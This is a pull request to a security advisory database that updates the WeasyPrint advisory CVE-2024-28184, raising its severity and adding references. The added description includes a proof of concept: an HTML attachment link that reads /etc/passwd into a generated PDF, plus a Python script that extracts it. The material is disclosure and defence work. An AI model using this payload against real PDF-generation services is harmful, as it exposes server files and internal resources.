### PR TITLE
[GHSA-35jj-wx47-4w8r] WeasyPrint allows the attachment of arbitrary files and URLs to a PDF

### DIFF
--- a/advisories/github-reviewed/2024/03/GHSA-35jj-wx47-4w8r/GHSA-35jj-wx47-4w8r.json
+++ b/advisories/github-reviewed/2024/03/GHSA-35jj-wx47-4w8r/GHSA-35jj-wx47-4w8r.json
@@ -1,17 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-35jj-wx47-4w8r",
-  "modified": "2024-03-23T03:30:25Z",
+  "modified": "2024-04-01T05:01:36Z",
   "published": "2024-03-08T20:42:52Z",
   "aliases": [
     "CVE-2024-28184"
   ],
   "summary": "WeasyPrint allows the attachment of arbitrary files and URLs to a PDF",
-  "details": "### Impact\nSince version 61.0, there's a vulnerability which allows attaching content of arbitrary files and URLs to a generated PDF document, even if `url_fetcher` is configured to prevent access to files and URLs.\n\n### Patches\nFixed by 734ee8e that’s included in 61.2\n\n### Workarounds\n- Check that no PDF attachment is defined in source HTML.\n- Launch WeasyPrint in a sandbox that prevents access to the filesystem and the network.\n\n",
+  "details": "### Impact\nSince version 61.0, there's a vulnerability which allows attaching content of arbitrary files and URLs to a generated PDF document, even if `url_fetcher` is configured to prevent access to files and URLs.\n\nExploitation of this vulnerability can lead to Server Side Request Forgery (SSRF), Remote File Inclusion (RFI), and Local File Inclusion (LFI).\n\n### Proof of Concept\n\n```html\n<link rel=attachment href=”file:///etc/passwd”>\n```\n\nThis embeds files right into the PDF itself. They aren’t visible within the PDF, but they’re included as a hidden resource on the file, which can then be extracted with the following script:\n\n```py\nimport sys, zlib\n\ndef main(fn):\n    data = open(fn, 'rb').read()\n    i = 0\n    first = True\n    last = None\n    while True:\n        i = data.find(b'>>\\nstream\\n', i)\n        if i == -1:\n            break\n        i += 10\n        try:\n            last = cdata = zlib.decompress(data[i:])\n            if first:\n                first = False\n            else:\n                pass#print cdata\n        except:\n            pass\n    print(last.decode('utf-8'))\n\nif __name__=='__main__':\n    main(*sys.argv[1:])\n```\n\n### Patches\nFixed by 734ee8e that’s included in 61.2\n\n### Workarounds\n- Check that no PDF attachment is defined in source HTML.\n- Launch WeasyPrint in a sandbox that prevents access to the filesystem and the network.\n\n",
   "severity": [
     {
       "type": "CVSS_V3",
-      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
     }
   ],
   "affected": [
@@ -58,13 +58,30 @@
     {
       "type": "WEB",
       "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLQZMOEDY72TS43HDXOBVID2VYCTWIH6"
+    },
+    {
+      "type": "WEB",
+      "url": "https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf"
+    },
+    {
+      "type": "WEB",
+      "url": "https://nahamsec.com/posts/my-expense-report-resulted-in-a-server-side-request-forgery-ssrf-on-lyft"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.youtube.com/watch?v=t5fB6OZsR6c"
+    },
+    {
+      "type": "WEB",
+      "url": "https://youtu.be/o-tL9ULF0KI?si=SYCKpseEQr-f8rZa"
     }
   ],
   "database_specific": {
     "cwe_ids": [
-      "CWE-829"
+      "CWE-829",
+      "CWE-918"
     ],
-    "severity": "HIGH",
+    "severity": "CRITICAL",
     "github_reviewed": true,
     "github_reviewed_at": "2024-03-08T20:42:52Z",
     "nvd_published_at": "2024-03-09T01:15:07Z"


### PR DESCRIPTION
**Updates**
- Affected products
- CVSS
- CWEs
- Description
- References
- Severity

**Comments**
I'm doing research for Chainguard on old vulnerabilities that were found/discussed at BlackHat and DEFCON that never had CVE's assigned to them. This one seems like it did, but for a case I hadn't expected. I've attached some additional resources/information I've gathered while re-exploring this vulnerability in more depth.